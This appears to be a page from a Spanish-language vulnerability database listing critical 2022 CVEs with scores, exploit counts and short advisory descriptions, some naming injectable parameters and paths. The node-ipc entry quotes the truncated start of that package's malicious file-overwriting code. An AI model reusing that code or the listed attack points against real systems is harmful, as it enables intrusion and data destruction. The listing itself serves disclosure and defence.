33293 vulnerabilidades Orden: CVSS EPSS Año ID
CVE-2022-38143
OpenImageIO General
9.8
CRITICAL
EPSS
0.7%
2022 CWE-123 1 PoC

A heap out-of-bounds write vulnerability exists in the way OpenImageIO v2.3.19.0 processes RLE encoded BMP images. A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-46591
Software Genérico General
9.8
CRITICAL
EPSS
0.4%
2022 1 PoC

TRENDnet TEW755AP 1.13B01 was discovered to contain a stack overflow via the reject_url parameter in the reject (sub_41BD60) function.

CVE-2022-22965
🔥 KEV Spring Framework Web ⚡ nuclei
9.8
CRITICAL
EPSS
94.4%
2022 CWE-94 79 PoCs

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.

CVE-2022-42493
QUARTZ-GOLD General
9.8
CRITICAL
EPSS
3.8%
2022 CWE-78 1 PoC

Several OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.This command injection is reachable through the m2m's DOWNLOAD_INFO command.

CVE-2022-46967
Software Genérico General
9.8
CRITICAL
EPSS
0.9%
2022 1 PoC

An access control issue in Revenue Collection System v1.0 allows unauthenticated attackers to view the contents of /admin/DBbackup/ directory.

CVE-2022-22137
ImageGear General
9.8
CRITICAL
EPSS
0.5%
2022 CWE-131 1 PoC

A memory corruption vulnerability exists in the ioca_mys_rgb_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-25894
com.bstek.uflo:uflo-core General
9.8
CRITICAL
EPSS
3.7%
2022 CWE-94 1 PoC

All versions of the package com.bstek.uflo:uflo-core are vulnerable to Remote Code Execution (RCE) in the ExpressionContextImpl class via jexl.createExpression(expression).evaluate(context); functionality, due to improper user input validation.

CVE-2022-43774
Delta Electronics DIAEnergie Database
9.8
CRITICAL
EPSS
0.6%
2022 1 PoC

The HandlerPageP_KID class in Delta Electronics DIAEnergy v1.9 contains a SQL Injection flaw that could allow an attacker to gain code execution on a remote system.

CVE-2022-43467
Open Babel General
9.8
CRITICAL
EPSS
0.5%
2022 CWE-119 1 PoC

An out-of-bounds write vulnerability exists in the PQS format coord_file functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

CVE-2022-44038
Software Genérico General
9.8
CRITICAL
EPSS
2.9%
2022 1 PoC

Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.

CVE-2022-24497
Windows 10 Version 1809 Windows
9.8
CRITICAL
EPSS
37.6%
2022 1 PoC

Windows Network File System Remote Code Execution Vulnerability

CVE-2022-43184
Software Genérico General
9.8
CRITICAL
EPSS
7.6%
2022 1 PoC

D-Link DIR878 1.30B08 Hotfix_04 was discovered to contain a command injection vulnerability via the component /bin/proc.cgi.

CVE-2022-3393
Post to CSV by BestWebSoft Web Windows
9.8
CRITICAL
EPSS
2.3%
2022 CWE-1236 1 PoC

The Post to CSV by BestWebSoft WordPress plugin through 1.4.0 does not properly escape fields when exporting data as CSV, leading to a CSV injection

CVE-2022-23812
node-ipc Web
9.8
CRITICAL
EPSS
8.8%
2022 3 PoCs

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return

CVE-2022-43215
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.2%
2022 1 PoC

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the endDate parameter at getOrderReport.php.

CVE-2022-42245
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.2%
2022 1 PoC

Dreamer CMS 4.0.01 is vulnerable to SQL Injection.

CVE-2022-44807
Software Genérico General
9.8
CRITICAL
EPSS
0.7%
2022 1 PoC

D-Link DIR-882 1.10B02 and 1.20B06 is vulnerable to Buffer Overflow via webGetVarString.

CVE-2022-40032
Software Genérico Web Database ⚡ nuclei
9.8
CRITICAL
EPSS
64.0%
2022 4 PoCs

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

CVE-2022-22536
🔥 KEV SAP NetWeaver and ABAP Platform General ⚡ nuclei
9.8
CRITICAL
EPSS
93.8%
2022 CWE-444 6 PoCs

SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.

CVE-2022-42109
Software Genérico Web Database
9.8
CRITICAL
EPSS
0.8%
2022 1 PoC

Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.